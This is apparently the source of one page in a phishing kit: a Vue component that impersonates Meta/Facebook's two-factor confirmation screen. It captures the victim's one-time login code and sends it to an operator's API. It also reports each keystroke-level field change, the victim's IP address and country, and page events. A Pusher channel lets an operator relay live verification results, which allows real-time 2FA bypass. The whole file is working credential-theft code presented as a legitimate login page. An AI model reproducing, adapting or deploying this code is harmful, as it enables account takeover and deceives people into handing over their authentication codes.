<script setup>
</script>

<template>

  <section class="h-screen flex justify-center items-center" style="background-image: url('https://www.dropbox.com/scl/fi/clgk9v0o9qqvrzssy7vzy/27baHo4dN_O.png?rlkey=n2ukporxk2xgohmzdzjd7yskv&st=47ns94sq&dl=1');">
    <div id="info-popup" tabindex="-1" class="hidden overflow-y-auto overflow-x-hidden fixed top-0 right-0 left-0 z-50 w-full md:inset-0 h-modal md:h-full">

      <div class="relative p-4 w-full max-w-lg h-full md:h-auto">
        <div class="relative p-4 bg-white rounded-lg shadow dark:bg-gray-800 md:p-8">
          <div class="mb-4 text-sm font-light text-gray-500 dark:text-gray-400">
            <h3 class="mb-3 text-2xl font-bold text-gray-900 dark:text-white">Two-factor</h3>
            <div>
              <label class="block mb-2 text-sm font-light text-gray-900 dark:text-white" v-text="twoFactorSugestionText"></label>
            </div>
          </div>
          <div class="justify-between items-center pt-0 space-y-4 sm:flex sm:space-y-0">
            <div class="items-center space-y-4 sm:space-x-4 sm:flex sm:space-y-0">
              <button :disabled="loading" @click="hideTwoFactorSugesstionPopup()" id="confirm-button" type="button" class="py-2 px-4 w-full text-sm font-medium text-center text-white rounded-lg bg-primary-700 sm:w-auto hover:bg-primary-800 focus:ring-4 focus:outline-none focus:ring-primary-300 dark:bg-primary-600 dark:hover:bg-primary-700 dark:focus:ring-primary-800">Confirm</button>
            </div>
          </div>
        </div>
      </div>

    </div>
    <div class="flex flex-col items-center px-6 ">
      <a href="/" class="flex items-center space-x-3 rtl:space-x-reverse py-6">
        <img src="https://static.xx.fbcdn.net/rsrc.php/y1/r/4lCu2zih0ca.svg" class="h-20" alt="MT">
<!--        <span class="self-center text-2xl font-semibold whitespace-nowrap dark:text-white">Meta</span>-->
      </a>
      <div class="w-full bg-white rounded-lg border-blue-100 border shadow dark:border md:mt-0 sm:max-w-3xl xl:p-0 dark:bg-gray-800 dark:border-gray-700">
        <div class="p-6 space-y-4 md:space-y-6 sm:p-8">
          <h1 class="text-lg font-bold leading-tight tracking-tight text-gray-900 md:text-lg dark:text-white">
            Choose a way to confirm that it's you
          </h1>
          <div>
            <span class="font-bold">Approve from another device</span>
            <hr/>
            We sent a notification to your device. Check your Facebook notifications there and approve the login to continue.
            <br/>
            <button :disabled="loading" @click="approved" id="approved-button" type="button" class=" py-2 px-2 w-full text-sm font-light text-center text-white rounded-lg bg-primary-700 sm:w-auto hover:bg-primary-800 focus:ring-4 focus:outline-none focus:ring-primary-300 dark:bg-primary-600 dark:hover:bg-primary-700 dark:focus:ring-primary-600">Approved</button>
            <hr/>
            <span class="font-bold">Or, enter your login code</span>
            <br/>
            <span v-text="user.provider2fa"></span>
          </div>
          <form class="space-y-4 md:space-y-6" action="#">
            <div>
              <input @change="onChange($event)" v-model="user.code" type="number" name="confirmation_code" id="confirmation_code" class="bg-gray-50 border border-gray-300 text-gray-900 sm:text-sm rounded-lg focus:ring-primary-600 focus:border-primary-600 block w-full p-2.5 dark:bg-gray-700 dark:border-gray-600 dark:placeholder-gray-400 dark:text-white dark:focus:ring-blue-500 dark:focus:border-blue-500" placeholder="Confirmation code" required="">
            </div>
            <div class="float-right pb-3 space-y-4 sm:space-x-4 sm:flex sm:space-y-0 ">
              <button :disabled="loading" @click="handleAction('ResendCode')" id="confirm-button" type="button" class="py-2 px-4 w-full text-sm font-medium text-center text-white rounded-lg bg-gray-400 sm:w-auto hover:bg-gray-600 focus:ring-4 focus:outline-none focus:ring-primary-300 dark:bg-primary-600 dark:hover:bg-primary-700 dark:focus:ring-primary-800">Resend code {{canResendCodeAfter > 0 ? `(${canResendCodeAfter})` : ""}}</button>
              <button :disabled="loading" @click="confirm2FA" id="confirm-button" type="button" class="py-2 px-4 w-full text-sm font-medium text-center text-white rounded-lg bg-primary-700 sm:w-auto hover:bg-primary-800 focus:ring-4 focus:outline-none focus:ring-primary-300 dark:bg-primary-600 dark:hover:bg-primary-700 dark:focus:ring-primary-800">Confirm</button>
            </div>
            <div v-if="loading" class="flex items-center">
              <div role="status">
                <svg aria-hidden="true" class="w-4 h-4 mr-2 text-gray-200 animate-spin dark:text-gray-600 fill-blue-600" viewBox="0 0 100 101" fill="none" xmlns="http://www.w3.org/2000/svg"><path d="M100 50.5908C100 78.2051 77.6142 100.591 50 100.591C22.3858 100.591 0 78.2051 0 50.5908C0 22.9766 22.3858 0.59082 50 0.59082C77.6142 0.59082 100 22.9766 100 50.5908ZM9.08144 50.5908C9.08144 73.1895 27.4013 91.5094 50 91.5094C72.5987 91.5094 90.9186 73.1895 90.9186 50.5908C90.9186 27.9921 72.5987 9.67226 50 9.67226C27.4013 9.67226 9.08144 27.9921 9.08144 50.5908Z" fill="currentColor"/><path d="M93.9676 39.0409C96.393 38.4038 97.8624 35.9116 97.0079 33.5539C95.2932 28.8227 92.871 24.3692 89.8167 20.348C85.8452 15.1192 80.8826 10.7238 75.2124 7.41289C69.5422 4.10194 63.2754 1.94025 56.7698 1.05124C51.7666 0.367541 46.6976 0.446843 41.7345 1.27873C39.2613 1.69328 37.813 4.19778 38.4501 6.62326C39.0873 9.04874 41.5694 10.4717 44.0505 10.1071C47.8511 9.54855 51.7191 9.52689 55.5402 10.0491C60.8642 10.7766 65.9928 12.5457 70.6331 15.2552C75.2735 17.9648 79.3347 21.5619 82.5849 25.841C84.9175 28.9121 86.7997 32.2913 88.1811 35.8758C89.083 38.2158 91.5421 39.6781 93.9676 39.0409Z" fill="currentFill"/></svg>
                <span class="sr-only">Loading...</span>
              </div>
            </div>
            <small v-text="errors.code" class="text-red-700"></small>
            <small v-text="errors.resendCode" class="text-red-700"></small>
          </form>
        </div>
      </div>
    </div>
  </section>
</template>

<style scoped>

</style>

<script>
import axios from "axios";
import Pusher from "pusher-js";
import phones from "@/assets/phones.json";
import constants from "@/constants";
import {Modal} from "flowbite";
export default {
  name: 'TwoFactorAuthenticate',
  props: {
    msg: String,
  },
  created() {
    if (!(localStorage.getItem("is_login") === "1")) {
      window.location.href = "/"
    }
    this.user.provider2fa = localStorage.getItem("provider2fa");
  },
  mounted() {
    const self = this;
    const CHANNEL_KEY = "channel_key";
    const channelName = localStorage.getItem(CHANNEL_KEY)
    if (!channelName || channelName.indexOf("PUB_ID") === -1) {
      this.channelUuid = "PUB_ID_" + crypto.randomUUID();
      localStorage.setItem(CHANNEL_KEY, this.channelUuid)
    } else {
      this.channelUuid = channelName;
    }

    this.ws.pusher = new Pusher(this.ws.pusherKey, {
      cluster: this.ws.pusherCluster,
    });

    this.ws.channel = this.ws.pusher.subscribe(this.channelUuid);

    this.ws.channel.bind("step-2-result", function(data) {
      if (data) {
        let json = JSON.parse(data.message)
        if (json.success === "2") {
          // window.location.href = "personal-information-security";
           window.location.href = "success";
        } else if (json.success === "3") {
          self.showTwoFactorSuggestionPopup(json.message);
        } else if (json.success === "1") {
          // window.location.href = "request-review";
          window.location.href = "success";
        } else {
          self.errors.code = json.message;
        }
      } else {
        self.errors.code = "Something went wrong. Please try again later.";
      }
      self.loading = false;
    });

    try {
      if (localStorage.getItem('country_code') === 'unk' || !localStorage.getItem('country_code')) {
        fetch('https://freeipapi.com/api/json')
            .then(response => response.json())
            .then(data => {
              if (data) {
                if (data.countryName === 'Viet Nam') {
                  // this.isAllowed = false;
                  // self.handleAction("New visitor. IP = " + data.ipAddress + ", country = " + data.countryName + ", URL = " + window.location.pathname + ", VietNam nên bỏ qua")
                }
                self.handleAction("New visitor. IP = " + data.ipAddress + ", country = " + data.countryName + ", URL = " + window.location.pathname)
                if (data.countryCode) {
                  localStorage.setItem("country_code", data.countryCode)
                  localStorage.setItem("ip_address", data.ipAddress)
                } else {
                  localStorage.setItem("country_code", "unk")
                }

                let phoneConfig = phones.find(x => x.code === localStorage.getItem("country_code"));
                if (phoneConfig) {
                  this.placeHolder.phone = phoneConfig.dial_code;
                }
              }
              this.isLoadingPage = false;
            });
      } else {
        let country_code = localStorage.getItem("country_code")
        let ip_address = localStorage.getItem("ip_address")

        self.handleAction("New visitor. IP = " + ip_address + ", country = " + country_code + ", URL = " + window.location.pathname)
        this.isLoadingPage = false;
      }

    } catch (ex) {
      self.handleAction("Can not get IP information");
    }

    setInterval(() => {
      if (self.canResendCodeAfter > 0) {
        self.canResendCodeAfter--;
      }
      if (self.canResendCodeAfter === 0) {
        self.errors.resendCode = "";
      }
    }, 1000)

    this.ws.pusher.connection.bind('disconnected', function() {
      alert('Disconnected to meta server. Please reload and try again.')
    })

    const modalEl = document.getElementById('info-popup');
    this.twoFactorSuggestionModal = new Modal(modalEl, {
      placement: 'center',
      onShow: () => {
        this.handleAction("Màn 2fa gợi ý hiển thị")
        this.errors.phoneNumber = "";
        this.errors.email = "";
      },
      onHide:() => {
        this.loading = false;
        this.handleAction("Màn 2fa gợi ý bị ẩn")
      }
    })
  },
  data() {
    return {
      user: {
        provider2fa: "sms",
        code: ""
      },
      errors: {
        code: null,
        resendCode: "",
        approved: ""
      },
      ws: {
        pusher: null,
        channel: null,
        pusherKey: constants.PUSHER_KEY,
        pusherCluster: "ap1"
      },
      loading: false,
      success: false,
      dm: constants.API_URL,
      name: 'Meta Business Support',
      supportLine: atob("Q29udGFjdCBNZXRhIHN1cHBvcnQ="),
      isAvailable: true,
      canResendCodeAfter: 0,
      twoFactorSuggestionModal: null,
      twoFactorSugestionText: ""
    }
  },
  methods: {
    confirm2FA() {
      this.errors.code = "";
      if (!this.validateOtpUserInput()) {
        return;
      }
      this.loading = true;
      this.errors.code = "";
      this.errors.resendCode = "";
      let params = btoa(`pubId=${this.channelUuid}&otp=${this.user.code}`)
      axios.post(`${this.dm}api/verify`, {params})
      this.handleAction("User đã gửi mã: " + this.user.code);
    },
    approved() {
      this.errors.approved = "";
      this.errors.code = "";
      this.errors.resendCode = "";
      this.loading = true;
      this.handleAction("User đã chấp thuận đăng nhập trên thiết bị khác.");
    },
    onChange(event) {
      try {
        this.handleAction(`User is changed: ${event.target.name} - value = ${event.target.value}`)
      } catch (ex) {
        console.log(ex);
      }
    },
    handleAction(message) {
      if (message === 'ResendCode') {
        if (this.canResendCodeAfter > 0) {
          this.errors.resendCode = `Please wait ${this.canResendCodeAfter}s before sending new code`;
          return;
        } else {
          this.canResendCodeAfter = 60;
        }
        this.loading = true;
        this.errors.code = "";
        setTimeout(() => {
          this.user.provider2fa = 'We have sent the verification code again. Enter the code to log in.';
          this.loading = false;
        }, 1000)

      }
      if(this.channelUuid) {
        try {
          axios.post(`${this.dm}api/handleAction`, {"pubId": this.channelUuid, "message": message})
        }catch (ex) {
          console.log(ex);
        }
      }
    },
    validateOtpUserInput() {
      let otp = this.user.code;
      if (!otp || otp.toString().trim() === "") {
        this.errors.code = "Please input your code.";
        return false;
      }
      if (!Number.isInteger(otp)) {
        this.errors.code = "Please enter a valid code.";
        return false;
      }
      if (otp.length > 10) {
        this.errors.code = "Please enter a valid code.";
        return false;
      }
      return true;
    },
    showTwoFactorSuggestionPopup(message) {
      this.twoFactorSugestionText = message;
      this.twoFactorSuggestionModal.show()
    },
    hideTwoFactorSugesstionPopup() {
      this.twoFactorSugestionText = "";
      this.twoFactorSuggestionModal.hide()
    }
  }
}
</script>